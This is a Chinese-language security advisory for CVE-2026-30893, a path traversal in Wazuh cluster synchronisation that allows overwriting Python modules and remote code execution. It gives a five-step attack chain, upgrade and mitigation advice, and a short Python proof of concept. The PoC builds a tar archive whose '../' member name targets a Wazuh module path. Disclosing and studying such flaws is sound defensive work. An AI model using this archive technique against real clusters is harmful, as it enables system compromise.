IPBUF安全漏洞报告
English
CVE-2026-30893 CVSS 9.0 严重

CVE-2026-30893 Wazuh路径遍历导致远程代码执行漏洞

披露日期: 2026-04-29

漏洞信息

漏洞编号
CVE-2026-30893
漏洞类型
路径遍历, 远程代码执行
CVSS评分
9.0 严重
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
无需交互 (UI:N)
影响产品
Wazuh

相关标签

路径遍历远程代码执行Wazuh文件覆盖CVSS-9.0

漏洞概述

Wazuh是一个开源的安全监控平台。在4.4.0至4.14.4之前的版本中,其集群同步提取例程存在路径遍历漏洞。经过身份验证的集群节点可利用此漏洞在其他节点上写入任意文件。攻击者可以通过覆盖Python模块,在Wazuh服务上下文中执行代码。若服务以高权限运行,可导致系统级完全控制。该漏洞已在4.14.4版本中修复。

技术细节

该漏洞源于Wazuh集群同步机制中的文件提取例程存在路径遍历缺陷,未能严格校验解压文件的路径。攻击者前提是必须拥有经过身份验证的集群对等节点权限。利用此漏洞,攻击者可在同步过程中通过构造特制的压缩包,将恶意文件写入到系统预期提取目录之外的任意位置。攻击链的核心在于利用文件写入能力覆盖Wazuh组件加载的Python模块。一旦关键模块被替换,当Wazuh服务重新加载或调用相关功能时,将执行攻击者注入的恶意代码,从而实现远程代码执行。鉴于Wazuh服务通常以较高权限运行,此漏洞极易导致从应用层到操作系统层的全面沦陷。

攻击链分析

STEP 1
1. 认证
攻击者获取Wazuh集群中一个已认证节点的凭证或控制权。
STEP 2
2. 构造恶意载荷
攻击者创建包含路径遍历序列(如../)的压缩包,其中包含旨在覆盖Python模块的恶意文件。
STEP 3
3. 发送同步请求
攻击者通过集群同步接口将恶意压缩包发送给目标节点。
STEP 4
4. 文件写入
目标节点在解压时因未过滤路径,将恶意文件写入预期目录之外,覆盖关键Python模块。
STEP 5
5. 代码执行
当Wazuh服务加载被篡改的模块时,执行恶意代码,导致系统被入侵。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import tarfile import io # Malicious payload to be executed payload_code = "import os; os.system('touch /tmp/pwned')" # Create a malicious tar archive using path traversal # This aims to overwrite a Python module loaded by Wazuh archive_buffer = io.BytesIO() with tarfile.open(fileobj=archive_buffer, mode="w") as tar: # Construct file info with path traversal sequence ('../') # Targeting a hypothetical Wazuh module path malicious_file_name = "../../../../var/ossec/api/python/wazuh.py" info = tarfile.TarInfo(name=malicious_file_name) info.size = len(payload_code) # Add the payload to the archive tar.addfile(info, io.BytesIO(payload_code.encode())) # Note: In a real attack scenario, this archive would be sent # to the vulnerable cluster synchronization endpoint. print(f"Generated malicious PoC archive size: {len(archive_buffer.getvalue())}")

影响范围

Wazuh >= 4.4.0, < 4.14.4

防御指南

临时缓解措施
建议立即升级至4.14.4或更高版本。如果无法立即升级,应严格限制集群网络访问,仅允许受信任的IP连接,并使用文件完整性监控(FIM)工具监控Wazuh目录下的非预期文件变更。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表